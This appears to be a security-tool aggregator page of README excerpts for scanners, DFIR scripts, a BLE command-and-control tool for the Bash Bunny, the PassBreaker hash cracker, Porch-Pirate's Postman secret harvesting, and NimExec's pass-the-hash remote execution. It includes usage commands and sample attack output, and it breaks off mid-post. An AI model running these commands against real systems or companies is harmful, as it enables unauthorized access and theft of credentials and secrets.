$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.1.1  β”‚ **:6e:**:97:**:28 β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.3  β”‚ 00:**:22:**:12:** β”‚ 102         β”‚ InPro Comm                   β”‚
β”‚ 192.168.1.2  β”‚ **:32:**:bf:**:00 β”‚ 102         β”‚ Xiaomi Communications Co Ltd β”‚
β”‚ 192.168.1.98 β”‚ d4:**:64:**:5c:** β”‚ 102         β”‚ ASUSTek COMPUTER INC.        β”‚
β”‚ 192.168.1.25 β”‚ **:49:**:00:**:38 β”‚ 102         β”‚ Unknown                      β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



TOR Virtual Network Tunneling Tool 0.4.8.10

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

Douglas-042 - Powershell Script To Help Speed ​​Up Threat Hunting Incident Response Processes

By: Zion3R


DOUGLAS-042 stands as an ingenious embodiment of a PowerShell script meticulously designed to expedite the triage process and facilitate the meticulous collection of crucial evidence derived from both forensic artifacts and the ephemeral landscape of volatile data. Its fundamental mission revolves around providing indispensable aid in the arduous task of pinpointing potential security breaches within Windows ecosystems. With an overarching focus on expediency, DOUGLAS-042 orchestrates the efficient prioritization and methodical aggregation of data, ensuring that no vital piece of information eludes scrutiny when investigating a possible compromise. As a testament to its organized approach, the amalgamated data finds its sanctuary within the confines of a meticulously named text file, bearing the nomenclature of the host system's very own hostname. This practice of meticulous data archival emerges not just as a systematic convention, but as a cornerstone that paves the way for seamless transitions into subsequent stages of the Forensic journey.


Content Queries

  • General information
  • Accountand group information
  • Network
  • Process Information
  • OS Build and HOTFIXE
  • Persistence
  • HARDWARE Information
  • Encryption information
  • FIREWALL INFORMATION
  • Services
  • History
  • SMB Queries
  • Remoting queries
  • REGISTRY Analysis
  • LOG queries
  • Instllation of Software
  • User activity

Advanced Queries

  • Prefetch file information
  • DLL List
  • WMI filters and consumers
  • Named pipes

Usage

Using administrative privileges, just run the script from a PowerShell console, then the results will be saved in the directory as a txt file.

$ PS >./douglas.ps1

Advance usage

$ PS >./douglas.ps1 -a


Video




Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

By: Zion3R


py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


Installation

  • Via pip

    pip install pyamsi
  • Clone repository

    git clone https://github.com/Tomiwa-Ot/py-amsi.git
    cd py-amsi/
    python setup.py install

Usage

dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto">
from pyamsi import Amsi

# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level Meaning
0 AMSI_RESULT_CLEAN (File is clean)
1 AMSI_RESULT_NOT_DETECTED (No threat detected)
16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768 AMSI_RESULT_DETECTED (File is considered malware)

Docs

https://tomiwa-ot.github.io/py-amsi/index.html



AcuAutomate - Unofficial Acunetix CLI Tool For Automated Pentesting And Bug Hunting Across Large Scopes

By: Zion3R


AcuAutomate is an unofficial Acunetix CLI tool that simplifies automated pentesting and bug hunting across extensive targets. It's a valuable aid during large-scale pentests, enabling the easy launch or stoppage of multiple Acunetix scans simultaneously. Additionally, its versatile functionality seamlessly integrates into enumeration wrappers or one-liners, offering efficient control through its pipeline capabilities.


Installation

git clone https://github.com/danialhalo/AcuAutomate.git
cd AcuAutomate
chmod +x AcuAutomate.py
pip3 install -r requirements.txt

Configuration (config.json)

Before using AcuAutomate, you need to set up the configuration file config.json inside the AcuAutomate folder:

{
"url": "https://localhost",
"port": 3443,
"api_key": "API_KEY"
}
  • The URL and PORT parameter is set to default acunetix settings, However this can be changed depending on acunetix configurations.
  • Replace the API_KEY with your acunetix api key. The key can be obtained from user profiles at https://localhost:3443/#/profile

Usage

The help parameter (-h) can be used for accessing more detailed help for specific actions

    		                               __  _                 ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py [-h] {scan,stop} ...

Launch or stop a scan using Acunetix API

positional arguments:
{scan,stop} Action to perform
scan Launch a scan use scan -h
stop Stop a scan

options:
-h, --help show this help message and exit

Scan Actions

For launching the scan you need to use the scan actions:

xubuntu:~/AcuAutomate$ ./AcuAutomate.py scan -h

usage: AcuAutomate.py scan [-h] [-p] [-d DOMAIN] [-f FILE]
[-t {full,high,weak,crawl,xss,sql}]

options:
-h, --help show this help message and exit
-p, --pipe Read from pipe
-d DOMAIN, --domain DOMAIN
Domain to scan
-f FILE, --file FILE File containing list of URLs to scan
-t {full,high,weak,crawl,xss,sql}, --type {full,high,weak,crawl,xss,sql}
High Risk Vulnerabilities Scan, Weak Password Scan, Crawl Only,
XSS Scan, SQL Injection Scan, Full Scan (by default)

Scanning Single Target

The domain can be provided with -d flag for single site scan:

./AcuAutomate.py scan -d https://www.google.com

Scanning Multiple Targets

For scanning multiple domains the domains need to be added into the file and then specify the file name with -f flag:

./AcuAutomate.py scan -f domains.txt

Pipeline

The AcuAutomate can also worked with the pipeline input with -p flag:

cat domain.txt | ./AcuAutomate.py scan -p

This is Great  as it can enable the AcuAutomate to work with other tools. For example we can use the subfinder , httpx and then pipe the output to AcuAutomate for mass scanning with acunetix:

subfinder -silent -d google.com | httpx -silent | ./AcuAutomate.py scan -p

scan type

The -t flag can be used to define the scan type. For example the following scan will only detect the SQL vulnerabilities:

./AcuAutomate.py scan -d https://www.google.com -t sql

Note

AcuAutomate only accept the domains with http:// or https://

Stop Action

The stop action can be used for stoping the scan either with -d flag for stoping scan by specifing the domain or with -a flage for stopping all running scans.

xubuntu:~/AcuAutomate$ ./AcuAutomate.py stop -h


__ _ ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py stop [-h] [-d DOMAIN] [-a]

options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain of the scan to stop
-a, --all Stop all Running Scans

Contact

Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to me on Twitter. @DanialHalo



CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

Limitation

infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
- Still in the development phase, sometimes it can't detect the real Ip.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
    cd CloakQuest3r
    pip3 install -r requirements.txt
    python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



BlueBunny - BLE Based C2 For Hak5's Bash Bunny

By: Zion3R


C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.

Overview

Structure


Installation & Start

  1. Install required dependencies
pip install pygatt "pygatt[GATTTOOL]"

Make sure BlueZ is installed and gatttool is usable

sudo apt install bluez
  1. Download BlueBunny's repository (and switch into the correct folder)
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
  1. Start the C2 server
sudo python c2-server.py
  1. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
  2. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

Manual communication with the Bash Bunny through Python

You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

Example Code

# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE

# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"

# Initialize BunnyLE
BunnyLE.init()

# Connect to your Bash Bunny
bb = BunnyLE.connect()

# Send the data and let it execute
BunnyLE.send(bb, data, d_type)

Troubleshooting

Connecting your Bash Bunny doesn't work? Try the following instructions:

  • Try connecting a few more times
  • Check if your bluetooth adapter is available
  • Restart the system your C2 server is running on
  • Check if your Bash Bunny is running the BlueBunny payload properly
  • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

Bugs within BlueZ

The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.

  • Timeout after 5.0 seconds
  • Unknown error while scanning for BLE devices

Working on...

  • Remote shell access
  • BLE exfiltration channel
  • Improved connecting process

Additional information

As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.



Kali Linux 2023.4 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2023.4. This release has various impressive updates.


The summary of the changelog since the 2023.3 release from August is:

PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R


PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β 

Features

  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PassBreaker.git
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

Options

  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.

Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım ârneği:

Usage Examples

Wordlist-based Password Cracking

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

Brute Force Attack

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

Password Complexity Evaluation

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

Using Salt Value

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

Parallel Processing

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

Disclaimer

This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

Contributing

Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

License

PassBreaker is released under the MIT License. See LICENSE for more information.



Simple Universal Fortigate Fuzzer Extension Script

This is a small extension script to monitor suff.py, or the Simple Universal Fortigate Fuzzer, and to collect crashlogs for future analysis.

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


Nikto Web Scanner 2.5.0

Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers.

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.


Search for c2 servers based on netlas (8)

Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the google.com IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit βœ…
Havoc ❓
Cobalt Strike βœ…
Bruteratel βœ…
Sliver βœ…
DeimosC2 βœ…
PhoenixC2 βœ…
Empire ❌
Merlin βœ…
Covenant ❌
Villain βœ…
Shad0w ❌
PoshC2 βœ…

Legend:

  • βœ… - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R


Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.


Compilation

nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname

Usage

test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

_..._
.-'_..._''.
_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'

@R0h1rr1m


[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.

References



GISEC Armory Edition 1 Dubai 2024 – Call For Tools is Open

We are excited to announce a groundbreaking partnership between ToolsWatch and GISEC 2024, as they

Black Hat Arsenal 2024 Next Stop Singapore !

Excitement is building in the cybersecurity community as the renowned Black Hat Arsenal gears up

T3SF - Technical Tabletop Exercises Simulation Framework

By: Zion3R


T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL) together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module performs the communication with the specific module (Discord, Slack, Telegram, etc.) that allows the events to present the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas".


Getting Things Ready

To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.

To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

# Python 3.6+ required
python -m venv .venv # We will create a python virtual environment
source .venv/bin/activate # Let's get inside it

pip install -U pip # Upgrade pip

Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

pip install "T3SF[Discord]"  # Install the framework to work with Discord

or

